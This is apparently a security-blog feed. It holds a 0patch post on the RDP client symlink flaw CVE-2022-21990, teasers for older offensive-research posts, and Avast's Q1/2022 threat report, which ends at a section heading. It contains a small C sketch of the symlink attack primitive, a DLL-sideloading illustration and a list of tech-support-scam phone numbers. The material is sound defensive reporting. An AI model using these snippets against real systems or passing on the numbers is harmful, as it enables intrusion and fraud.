
Micropatches for Remote Desktop Client RCE (CVE-2022-21990)

10 May 2022 at 15:50

 

by Mitja Kolsek, the 0patch Team

 

March 2022 Windows Updates brought a fix for a logical vulnerability in Remote Desktop Client for Windows that was found and reported by Abdelhamid Naceri. The vulnerability allowed a malicious RDP server to gain write access to any local drive on the computer running the connected RDP client, as long as at least one local drive was shared through the RDP session.

The trick Abdelhamid used in their POC was, as it so often happens, a symbolic link: suppose you connected to a malicious RDP server and shared a locally plugged-in USB drive E:. The server could then create a symbolic link from E:\temp to C:\ (meaning your local C: drive, not the server's), whereby the entire content of drive C:\ would become accessible to the server under E:\temp with the permissions of the connecting user.
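
To illustrate the primitive (a hypothetical sketch, not Abdelhamid's actual POC - the real attack goes through the RDP drive-redirection channel, and the \\tsclient\E naming of the redirected drive is an assumption here), creating such a directory link with the Win32 API could look like this:

#include <windows.h>
#include <stdio.h>

int main(void)
{
    // Hypothetical illustration: from the server side, plant a directory
    // symbolic link on the redirected client drive E: whose target, C:\,
    // resolves on the *client* machine. E:\temp would then expose the
    // client's entire C: drive with the connecting user's permissions.
    if (!CreateSymbolicLinkA("\\\\tsclient\\E\\temp", "C:\\",
                             SYMBOLIC_LINK_FLAG_DIRECTORY)) {
        printf("CreateSymbolicLinkA failed: %lu\n", GetLastError());
        return 1;
    }
    return 0;
}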

Microsoft assigned this issue CVE-2022-21990 and fixed it by preventing the server from creating symbolic links on shared drives that point to drives not shared with the server. This fix, however, was not delivered to Windows systems that no longer receive Windows Updates; such systems can now use our micropatches instead.

We decided to make our micropatches simpler than Microsoft's fix to avoid changing lots of code: our approach was to simply prevent creating symbolic links on drives that were shared with the server, regardless of where these links would point. We think it is very unlikely that our approach would break any reasonable use case - but just in case it does, the user can always temporarily disable our patch and then re-enable it - without restarting the computer or even re-establishing the RDP connection.

Our micropatch was written for the following Windows versions that don't receive official patches from Microsoft:


  1. Windows 10 v1803 updated to May 2021
  2. Windows 10 v1809 updated to May 2021
  3. Windows 10 v2004 updated to December 2021
  4. Windows 7 updated with ESU year 2, ESU year 1 or updated to January 2020
  5. Windows Server 2008 R2 updated with ESU year 2, ESU year 1 or updated to January 2020


This micropatch has already been distributed to all online 0patch Agents with a PRO or Enterprise license. To obtain the micropatch and have it applied on your computers along with our other micropatches, create an account in 0patch Central, install 0patch Agent and register it to your account with a PRO or Enterprise subscription. Note that no computer restart is needed for installing the agent or applying/un-applying any 0patch micropatch. 

To learn more about 0patch, please visit our Help Center.

We'd like to thank Abdelhamid Naceri for publishing their analysis and providing a proof-of-concept that allowed us to reproduce the vulnerability and create a micropatch. We also encourage security researchers to privately share their analyses with us for micropatching.

No more JuicyPotato? Old story, welcome RoguePotato!

5 May 2022 at 19:43
by splinter_code & decoder_it - 11 May 2020 After the hype we ( @splinter_code and me) created with our recent tweet , it’s time t...

Locky Ransomware is back! 49 domains compromised!

5 May 2022 at 19:43
by splinter_code - 26 June 2016 Locky ransomware starts up again its illegal activity of stealing money from their victims after a temporary inactivity since the end of May. This time, it comes with hard-coded javascript...

New Locky variant – Zepto Ransomware Appears On The Scene

5 May 2022 at 19:43
by splinter_code - 7 July 2016 New threat dubbed Zepto Ransomware is spreading out with a new email spam campaign. It is a variant of the...

Reverse Engineering a JavaScript Obfuscated Dropper

5 May 2022 at 19:43
by splinter_code - 31 July 2017 1. Introduction Nowadays one of the techniques most used to spread malware on windows systems is...

Weaponizing Mapping Injection with Instrumentation Callback for stealthier process injection

5 May 2022 at 19:43
by splinter_code - 16 July 2020 Process Injection is a technique to hide code behind benign and/or system processes. This technique is u...

RomHack2020 - Windows Privilege Escalations: Still abusing local service accounts to get SYSTEM privileges

5 May 2022 at 19:43
Slides here: https://github.com/antonioCoco/infosec-talks/blob/main/RomHack2020_Windows_Privilege_Escalations_Still_abusing_Service_Acco...

Relaying Potatoes: Another Unexpected Privilege Escalation Vulnerability in Windows RPC Protocol

5 May 2022 at 19:43
by splinter_code & decoder_it - 26 April 2021 Executive Summary Every Windows system is vulnerable to a particular NTLM relay attack...

We thought they were potatoes but they were beans (from Service Account to SYSTEM again)

5 May 2022 at 19:43
by splinter_code - 6 December 2019 This post has been written by me and two friends: @splinter_code and 0xea31 This is the “unintended...

Avast Q1/2022 Threat Report

5 May 2022 at 06:04

Cyberwarfare between Ukraine and Russia

Foreword

The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.

Similar to what’s happening in Ukraine, the warfare co-occurring in cyberspace is also very intensive, with a wide range of offensive arsenal in use. To name a few examples, we witnessed multiple Russia-attributed APT groups attacking Ukraine (deploying a series of wiping malware and ransomware strains, a massive uptick in Gamaredon APT toolkit activity, and disruptions of satellite internet connections). In addition, hacktivism, DDoS attacks on government sites, and data leaks are ongoing daily on all sides of the conflict. Furthermore, some malware authors and operators were directly affected by the war, such as the alleged death of the Raccoon Stealer lead developer, which resulted in an (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen sides in this conflict and have started threatening the others. One such example is the Conti gang, which promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.

With all that said, it is hardly surprising that we’ve seen a significant increase in attacks of particular malware types in countries involved in this conflict in Q1/2022; for example, we blocked 50% more RAT attacks in Ukraine, Russia, and Belarus, 30% more botnet attacks, and 20% more info-stealer attacks. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for HermeticRansom, which we discovered in Ukraine just a few hours before the invasion started.

Among the other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot-infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, the Lapsus$ hacking group emerged with breaches of big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.

Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.

Stay safe and enjoy reading this report.

Jakub Křoustek, Malware Research Director

Methodology

This report is structured into two main sections – Desktop-related threats, informing about our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, where we report on Android and iOS attacks.

Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.
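
For illustration (with hypothetical numbers): if 2,000 of 100,000 active users in a given country were attacked during a month, that month’s risk ratio for the country would be 2,000 / 100,000 = 2%.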

Desktop-Related Threats

Advanced Persistent Threats (APTs)

In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.

Operation Dragon Castling: relations between the malicious files

Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they had discovered a new data wiper called HermeticWiper. The attackers’ motivation was to maximize damage to the infected system: the wiper not only disrupts the MBR but also destroys the filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.

Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. This group’s usual high level of activity in Ukraine accelerated rapidly after the beginning of the Russian invasion at the end of February, when the number of their attacks grew several times over.

Gamaredon APT activity Q4/2021 vs. Q1/2022

Gamaredon APT targeting in Q1/22

We also noticed an increase in Korplug activity, which expanded its focus from the more usual Southeast Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda, and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road Initiative.

New Korplug detections in Africa and Papua New Guinea

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Jan Holman, Malware Researcher

Adware

Desktop adware has become more aggressive in Q4/21, and a similar trend persists in Q1/22, as the graph below illustrates:

On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.

On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.

Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.

Concerning the top strains, most adware hits (64%) came from a mix of unidentified adware families. The first clearly identified family is RelevantKnowledge, so far with a low prevalence (5%) but with a +97% increase compared to Q4/21. Other identified strains, each with a prevalence in the low single-digit percentages, are ICLoader, Neoreklami, DownloadAssistant, and Conduit.

As mentioned above, adware activity followed a similar trend as in Q4/21; therefore, the risk ratios remained the same. The most affected regions are still Africa and Asia. Looking at the Q1/22 data, we observed an increase in protected users in Japan (+209%) and France (+87%) compared with Q4/21. On the other hand, decreases were observed in the Russian Federation (-51%) and Ukraine (-50%).

Adware risk ratio in Q1/22.

Martin Chlumecký, Malware Researcher

Bots

It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through the Emotet takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and leaks of Conti’s internal communications indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly including BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp, “20220404”, interestingly observed on March 24th, instead of the one we had been accustomed to seeing (“20211114”).

There has been a new-ish trend coming with the advent of the war in Ukraine. Simple JavaScript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by a text denouncing Russian aggression in Ukraine in multiple languages, and it quickly spread around the internet in different variations, such as a variant of the open-source game 2048. Unfortunately, we started to see webpages that incorporated the code without declaring it, so your computer could end up participating in these actions while you were simply checking the weather online. While these could remind us of Anonymous DDoS operations and LOIC (the open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public, requiring only a browser and coming with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.

The rest of the landscape does not bring many surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%); neither should be much of a surprise, though for the latter, the increase mostly does not translate into a large number of affected clients.

In terms of numbers, the most prevalent strain was Emotet, which doubled its market share since last quarter. Most of the other top strains slightly declined in prevalence since the previous quarter. The most common strains we are seeing are:

  • Emotet
  • Amadey
  • Phorpiex
  • MyloBot
  • Nitol
  • MyKings
  • Dorkbot
  • Tofsee
  • Qakbot

Adolf Středa, Malware Researcher

Coinminers

Coincidentally, just as cryptocurrency prices have been somewhat stable these days, the same goes for malicious coinmining activity in our user base.

In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continuous and increasing trend of using web miners that execute JavaScript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).

The most common coinminers in Q1/22 were:

  • XMRig
  • NeoScrypt
  • CoinBitMiner
  • CoinHelper

Jan Rubín, Malware Researcher

Information Stealers

The activities of information stealers haven’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; in combination, they account for 50% of the hits within the category.

Activity of Information Stealers in Q1/22.

We noticed the regional distribution has shifted completely compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after increases in risk ratio of 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.

Latin America is not only a popular destination for information stealers; it also houses many region-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial gain. In Brazil, Ousaban and Chaes pose the most significant threats, with more than 100k and 70k hits, respectively. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared between these groups is a multiple-stage delivery chain that utilizes scripting languages to download and deploy the next stage’s payload, while employing DLL sideloading techniques to execute the final stage.
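
To see why DLL sideloading is so effective, consider this generic sketch (with a made-up module name, not code from these campaigns): Windows resolves a DLL loaded by bare name from the application’s own directory first, so planting a malicious DLL with an expected name next to a trusted, signed executable gets attacker code running inside the trusted process.

#include <windows.h>

// Generic DLL-sideloading illustration (hypothetical module name, not taken
// from Ousaban, Chaes, or Casbaneiro): a signed application loads a
// dependency by bare name. The DLL search order tries the application's own
// directory first, so a malicious "version.dll" dropped next to the EXE is
// loaded instead of the system copy, and its DllMain runs inside the
// trusted process.
int main(void)
{
    HMODULE mod = LoadLibraryA("version.dll");
    if (mod == NULL)
        return 1;
    // ... the application carries on, now hosting attacker-controlled code.
    return 0;
}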

Furthermore, Raccoon Stealer, an information stealer with Russian origins, has significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums announcing that the Raccoon group is no longer operating. A few days after the messages were posted, a Raccoon representative said one of their members died in the war in Ukraine – they have paused operations and plan to return in a few months with a new product.

Next, a macOS malware dubbed DazzleSpy was found using watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can control macOS remotely, execute arbitrary commands, and download and upload files to attackers, thus enabling keychain stealing, key-logging, and potential screen capture.

Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher
Vladimir Martyanov, Malware Researcher
Vladimír Žalud, Malware Analyst

Ransomware

We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen in the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.

We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuation of the trend of ransomware gangs focusing more on targeted attacks against big targets (big game hunting) rather than on regular users via spray-and-pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but a lot was going on in the ransomware space in Q1.

Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).

The most (un)popular ransomware strains – STOP and WannaCry – kept their positions at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies to the CrySiS ransomware. In both cases, the ransomware code hasn’t evolved considerably, so a new variant merely means a new extension for encrypted files, a different contact e-mail, and a different public RSA key.

The most prevalent ransomware strains in Q1/22:

  • WannaCry
  • STOP
  • VirLock
  • GlobeImposter
  • Makop

Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence, and also their egos, as demonstrated by their claim that they would pay a $1M bounty to any FBI agent who reveals their location. Later, they expanded that offer to any person on the planet.

You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report, we reported on the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April, as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and new malware samples. It is not yet clear whether this is a comeback, an imposter operation, reuse of Sodinokibi sources or infrastructure, or even a combination of these by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.

Russian ransomware affiliates are a never-ending story. For example, February brought an interesting public exposure of a criminal dubbed Wazawaka, with ties to Babuk, DarkSide, and other ransomware gangs. In a series of drunk videos and tweets, he revealed much more than his missing finger.

The Russian invasion and the war in Ukraine that followed, the most terrible event of Q1/22, had their counterpart in cyberspace. Just one day before the invasion, several cyberattacks were detected. Shortly after the discovery of the HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some ransomware authors and affiliates are from Ukraine and were likely unable to carry out their operations due to the war.

And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang declared its allegiance and threatened anyone considering organizing a cyber-attack or war activities against Russia:

As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant number of encryption keys was leaked. Also, the published sources were for older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization and also temporarily slowed down its operations.

Among the other consequences of the Conti leak, the published source code was soon used by the NB65 hacking group. This gang declared karmic war on Russia and used a modified version of the leaked Conti sources to attack Russian targets.

Furthermore, in February, members of one of the historically most active (and successful) ransomware groups, Maze, announced the shutdown of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:

  • 19 private RSA-2048 keys for Egregor ransomware. Egregor uses a three-key encryption schema (Master RSA Key → Victim RSA Key → Per-file Key).
  • 30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
  • A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the private RSA key is likely campaign-specific.
  • The source code of the M0yv x86/x64 file infector, which was used by Maze operators in the past.

Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. It immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetCompany that started using the “.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.

On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.

Jakub Křoustek, Malware Research Director
Ladislav Zezula, Malware Researcher

Remote Access Trojans (RATs)

New year, new RAT campaigns. As mentioned in the Q4/21 report, we expected the downward trend in RAT activity to be just temporary, and reality provided a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.

In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:

The countries most affected this quarter were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on in connection with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).

In this quarter, we spotted a new campaign distributing several RATs and reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a crypter (a tool used by malware authors to obfuscate and protect the target payload), which we call Rattler, that ensures distribution of arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main targets also seemed to change during the past three months. In January and February, we received a considerable number of detections from Russia and Ukraine; this trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.

Most prevalent RATs in Q1 were:

  • njRAT
  • Warzone
  • Remcos
  • AsyncRat
  • NanoCore
  • NetWire
  • QuasarRAT
  • PoisonIvy
  • Adwind
  • Orcus

Among the malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We have also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone, which declined this quarter by 23%. The njRAT family, on the other hand, increased by 32%, and, surprisingly, Adwind entered the top 10.

Beyond the usual malicious campaigns, this quarter was different, with two significant causes: the first was the Lapsus$ hacking and leaking spree, and the other was the war in Ukraine.

The hacking group Lapsus$ targeted many prominent technology companies like Nvidia, Samsung, and Microsoft. In the NVIDIA case, for example, the group stole about 1TB of NVIDIA’s data and then began leaking it. The leaked data contained code-signing certificates, which were later used to sign malicious binaries. Among such signed malware was, for example, the Quasar RAT.

Then there was the war in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDoS attacks, data stealing, exploitation, cyber espionage, and other techniques. Beyond the countries directly involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached Office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with the Remcos RAT via the Microsoft Office RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.

As always, it wasn’t only old, known RATs that showed up; this quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT appears to be a creation of the APT group FIN7; it contains the usual basic capabilities found in other RATs, such as taking screenshots, remote code execution, file transfer, and detection of installed AV.

Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT groups. Hodur differs in its encoding, configuration capabilities, and C&C commands. It allows attackers to log keystrokes, manipulate files, fingerprint the system, and more.

We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat, where the main character, Borat Sagdijev, played by actor Sacha Baron Cohen, is presented as a Kazakh visiting the USA. Did you know that, in reality, the parts of the film meant to depict life in a Kazakh village weren’t even filmed in Kazakhstan, but in the Romanian village of Glod?

This RAT is a .NET binary that uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities, including triggering BSODs, anti-sandbox and anti-VM checks, password stealing, web-cam spying, file manipulation, and more. Beyond these baked-in features, it offers extensive module functionality. These modules are DLLs downloaded on demand, allowing the attackers to add multiple new capabilities. The list of currently available modules includes “Ransomware.dll”, used for encrypting files, “Discord.dll”, for stealing Discord tokens, and many more.

Here you can see an example of the Borat RAT admin panel. 

We also noticed that the volume of compiled-Python and Go ELF binaries for Linux increased this quarter. The threat actors used open-source RAT projects (e.g., Bring Your Own Botnet or Ares) and legitimate services (e.g., Onion.pet, termbin.com, or Discord) to compromise systems. We were also among the first to protect users against the Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.

Samuel Sidor, Malware Researcher
Jan Rubín, Malware Researcher
David Àlvarez, Malware Researcher

Rootkits

In Q1/22, rootkit activity was reduced compared to the previous quarter, returning to its long-term level, as illustrated in the chart below.

The close-up view of Q1/22 shows that January and February were more active than March.

We have monitored various rootkit strains in Q1/22 and identified that approximately 37% of rootkit activity comes from r77-Rootkit (R77RK), developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3, unlike the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc., and is compatible with Windows 7 and Windows 10. As a consequence, R77RK has been captured alongside several different types of malware, serving as a supporting library for malware that needs to hide its activity.

The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about +58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit, which had been spread worldwide, so the main rootkit activity has moved back to China. Decreases in rootkit activity were observed in the following countries: Vietnam, Thailand, the Czech Republic, and Egypt.

In summary, the situation around rootkit activity seems calmer compared to Q4/21, and China is still the most affected country in Q1/22. Notably, the war in Ukraine has not increased rootkit activity. Numerous malware authors have started using open-source rootkit solutions, although these are very easy to detect.

Martin Chlumecký, Malware Researcher

Technical support scams

After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in activity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.

According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active in other areas as well, such as Europe – for example, France and Germany.

The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.

During the beginning of March, we collected thousands of new unique domain-less URLs that share one significant and distinctive sign: their URL path. After being redirected, an affected user loads a web page with a well-known recycled appearance used in many previous technical support campaigns. Several pop-up windows, logos of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: to make the victim call the phone number shown.

More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:

1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992

Alexej Savčin, Malware Analyst

Traffic Direction System (TDS)

A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university and local government sites.

Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.

From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most users in Brazil (over 73,000), followed by India (nearly 55,000) and the US (more than 31,000).

Map illustrating the countries Parrot TDS has targeted (in March)

Jan Rubín, Malware Researcher
Pavel Novák, Threat Operations Analyst

Vulnerabilities and Exploits

Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22965), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is logic protecting the classLoader from being abused, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.

The Linux kernel had its share of vulnerabilities, too; one was found in pipes, which usually provide unidirectional interprocess communication, and it can be exploited for local privilege escalation. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on partially uninitialized memory in the pipe buffer during its construction, leading to an incorrect flags value that can provide write access to pages in the page cache that were originally marked read-only. The vulnerability is patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.

First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected a new exploitation attack involving it, which took place in Japan and targeted outdated Internet Explorer installations.

The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage has not changed much since the initial report; it still uses Slack as a C&C server, but now uses file[.]io for data exfiltration.

This is an excellent example of how old threats never really go away; they often continue to evolve and pose a threat.

Adolf Středa, Malware Researcher
Jan Vojtěšek, Malware Researcher

Mikrotik CVEs keep giving

It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. The simplicity of exploitation, the wide adoption of these devices, and their powerful features provided a solid foundation for various malicious campaigns executed using them. It started with injecting crypto-mining JavaScript into web pages by capturing traffic, then moved on to poisoning DNS caches and incorporating these devices into botnets for DDoS and proxy purposes.

Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we saw a lot of twists and turns, the most prominent of which was probably the Conti group leaks, which also shed light on the TrickBot botnet. For quite some time, we have known that TrickBot abused MikroTik devices as proxy servers to hide the next tier of its C&C. The leaking of the Conti and TrickBot infrastructure meant the end of this botnet. However, it also provided clues and information about one of the vastest botnet-as-a-service operations, connecting Glupteba, Meris, crypto-mining campaigns, and perhaps also TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research: Mēris and TrickBot standing on the shoulders of giants.

A few days before we published our research in March, a new story emerged describing a DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly, most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScorecard. They have observed another DDoS botnet, called Zhadnost, targeting Ukrainian institutions and again using MikroTik devices as an amplification vector, this time mainly misusing DNS amplification.

We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.

The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.

When we analyzed AS208484, the autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with TCP port 8728 exposed, the port used for API access to administer the devices. Also of concern, one of the devices had the port for the infamously vulnerable WinBox protocol exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.

We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not common practice and may also indicate compromise. Attackers have been known to remap the ports of standard services (such as SSH) to make them harder to detect, or even harder for the device owner to manage. However, the owner could also have configured this deliberately for the same reason: to hide SSH access from plain sight.

CVE-2018-14847 vulnerable devices in percent by country

From all the above, it’s apparent that we can expect similar patterns and DDoS attacks carried out not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (the OS that powers MikroTik appliances) are rolled out. Unfortunately, however, many devices are already compromised, and without administrative intervention, they will continue to be used for malicious operations repeatedly.

We strongly recommend that MikroTik administrators update and patch their devices to protect themselves and others.


If you are a researcher and think you have seen MikroTik devices involved in malicious activity, please consider contacting us for help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.

RouterOS major version 7 and above adoption

Martin Hron, Malware Researcher

Web skimming

